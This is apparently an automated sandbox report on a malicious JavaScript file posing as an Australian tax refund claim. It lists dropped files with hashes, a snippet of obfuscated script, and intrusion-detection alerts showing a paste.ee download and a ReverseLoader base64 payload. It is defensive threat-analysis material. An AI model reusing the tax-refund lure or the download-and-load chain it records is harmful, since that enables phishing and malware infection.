Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\RemoteData\edgeSettings_2.0-0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3581
Entropy (8bit):	4.459693941095613
Encrypted:	false
SSDEEP:	96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
MD5:	BDE38FAE28EC415384B8CFE052306D6C
SHA1:	3019740AF622B58D573C00BF5C98DD77F3FBB5CD
SHA-256:	1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
SHA-512:	9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
Malicious:	false
Preview:	{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	35302
Entropy (8bit):	7.99333285466604
Encrypted:	true
SSDEEP:	768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
MD5:	0E06E28C3536360DE3486B1A9E5195E8
SHA1:	EB768267F34EC16A6CCD1966DCA4C3C2870268AB
SHA-256:	F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
SHA-512:	45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
Malicious:	false
Preview:	.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-..F.1....g\|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a....6g3..%.gy../{\|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..\|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...\|$....;.k.......8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl........}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.000558936134823
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfX0oODiYAXTozRLuLgfGBkGAeekVy8HfzXNPIAclTNwyn:YWLSGT3O2YAXTo9LuLgfGBPAzkVj/T8v
MD5:	9BE1FAABBDD19BCD3A3964B05CE4E029
SHA1:	55453C9D8375E547CE1168BFB28CA68F5E3A5577
SHA-256:	2059AA0B6A6562A3B41BD8FF563455ADE2EBA1AD387B088830D9A01310D10DA0
SHA-512:	5AAE126F585F33486316C9477CE9652AA9E81D8406BCE93108A254573544B379A0164B7D852B748BC6A30A9BDBF76A5E68447A0815D79F186B2D3E282279B5AE
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"e7a83dc03f4791fe","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736163159003850}]}

C:\Users\user\AppData\Local\Temp\TmpUserData\c68bf23c-1de4-499a-977a-7370b6a9a71a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	7902
Entropy (8bit):	5.4990492807458216
Encrypted:	false
SSDEEP:	96:XXqsNk5hnVMfsnOsBJih/cI9URLl8Roto24k2eBarcvlwQKOe4WJktcqFanSDS43:KsNwh7VeeiRUBabQK/ktVwMekCf6
MD5:	C17E6611AC1D52D7230572CB32BFCC47
SHA1:	10DD9EFAB804AC64F6453BED8E98FF5E960EDCE8
SHA-256:	B3EAA3502AF3AE582BF31A6A7C17CDC74C9EFC8D135B4C056B597B8E82B9DA7E
SHA-512:	B83EBB368978BC500E0B3624AFF5CDB5485585959895BC79237330A7D9B0A7A6A85844EB8F07D64E7C5EE91DCA11592B51036401B81022FF328CF3C3A9E074D6
Malicious:	false
Preview:	{"apps_count_check_time":"13380535955677051","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sidebar":{"upsell_trigger_count":1},"fire_local_softlanding_notification":false,"fre":{"has_first_v

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11vrmnos.ede.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxkldiq4.zng.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbnbucso.2pm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lyt1hwcp.mti.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhoj045m.m5v.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnypg1eb.z35.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\bhv898F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xa7772592, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	20447232
Entropy (8bit):	1.2850868141270324
Encrypted:	false
SSDEEP:	12288:sGOeyIY7kKoOfvKDF2T++S5cflF9HnGZ8F:KI59Da+
MD5:	8514C0D677C74A540E8929EA43D2AB30
SHA1:	F50B1A756F61D2D205FC6F60B1F5F947DE0A2763
SHA-256:	0A74849D67886050CF0B7D96E9D55EC4616C15BF6867DECF4822A6AE2EB3F2F7
SHA-512:	EF723DA031D63339D7A8B503B1442A495703CEF4BE10E2C0F6D1A0BB9A479006CE542F935D186CBA6C86C64E1B34706637C526E2F5E496EEF872D3D7DEFC8D79
Malicious:	false
Preview:	.w%.... ........=......J}...0...{........................"..........{.......{].h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;..................................z:(.....{].................M.#......{]..........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\c0cf0867-790e-44e5-8fa4-3bb8d86b7540.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\yqrnzxuewrllgkpigkbsooiasehxvvunub

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	Unicode text, UTF-8 text, with very long lines (391), with CRLF line terminators
Entropy (8bit):	5.127408529665046
TrID:
File name:	Tax_Refund_Claim_2024_Australian_Taxation_Office.js
File size:	167'674 bytes
MD5:	a99ac2b0c9df4fc8b76f1c96bfce311c
SHA1:	3cbdd7d89a4d57005496a40cf1bf9a43e41f2635
SHA256:	496328b2630e631422e0e62da0ca876b54801a963c8e71ad79c0c4e20165999c
SHA512:	8d64a90a5ad998f1ccc7f490f4c494f96c2291fb53254cf1394e9ab7cee62cbe281b9d2d3ab4f7a945d2804744f21d83d4c5f3361dbc3f49958666f128dd0a10
SSDEEP:	1536:4zWfDq6wXS9V329iMiHQWpxE7EqU+GOK44nFlWETMJWlR4gqzDe/zQ6V2YrzJ50l:4zWf+6wC9I3iJAZafzQ6VdzjiI2fx
TLSH:	D6F3D748BD9AA06083B337794B1F5908ED7949230958E154FA9CD2D13FB182981FAFFD
File Content Preview:	..var gagwriter = "http://schemas.microsoft.com/windows/2003/08/printing/printschemakeywords";..var forger = "http://schemas.microsoft.com/windows/2013/05/printing/printschemakeywordsv11";..var popeyed = "http://schemas.microsoft.com/windows/2013/12/print

File Icon


Icon Hash:	68d69b8bb6aa9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-05T08:32:21.867224+0100	2841075	ETPRO MALWARE Terse Request to paste .ee - Possible Download	1	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-05T08:32:22.044508+0100	2020424	ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1	1	188.114.96.3	443	192.168.2.4	49738	TCP
2025-01-05T08:32:22.044508+0100	2020425	ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2	1	188.114.96.3	443	192.168.2.4	49738	TCP
2025-01-05T08:32:22.488684+0100	2858295	ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)	1	188.114.96.3	443	192.168.2.4	49738	TCP
